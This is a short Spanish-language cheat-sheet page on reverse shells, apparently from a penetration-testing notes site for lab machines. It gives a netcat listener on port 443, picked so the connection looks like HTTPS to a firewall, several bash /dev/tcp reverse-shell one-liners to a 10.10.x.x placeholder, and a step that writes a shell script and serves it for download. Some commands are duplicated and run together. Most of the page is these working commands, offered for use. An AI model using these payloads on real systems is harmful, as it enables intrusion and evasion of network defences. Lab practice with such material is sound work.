Reverse Shell
Desde nuestra máquina configuramos un listener para recibir la conexión inversa. Usando el comando:
nc -nlvp 443Abrimos el puerto 443, que se asocia normalmente al tráfico HTTPS. De este modo, el firewall podría interpretar la conexión como una solicitud legítima a una página web, lo que ayuda a disimular la actividad. Cuando la máquina víctima se conecta, obtenemos una shell interactiva para ejecutar comandos remotamente.
Bash
/bin/bash -c 'bash -i >& /dev/tcp/10.10.x.x/443 0>&1'bash -i >& /dev/tcp/10.10.x.x/443 0>&1/bin/bash -c 'bash -i >& /dev/tcp/10.10.x.x/443 0>&1'bash -i >& /dev/tcp/10.10.x.x/443 0>&1/bin/bash -c '0<&196;exec 196<>/dev/tcp/10.10.x.x/443; sh <&196 >&196 2>&196'0<&196;exec 196<>/dev/tcp/10.10.x.x/443; sh <&196 >&196 2>&196Curl + Bash
echo -n '#!/bin/bash \n/bin/bash -c "bash -i >& /dev/tcp/10.10.x.x/443 0>&1"' > shell.sh
python3 -m http.server 80Perl
Python
PHP
Netcat
Última actualización
¿Te fue útil?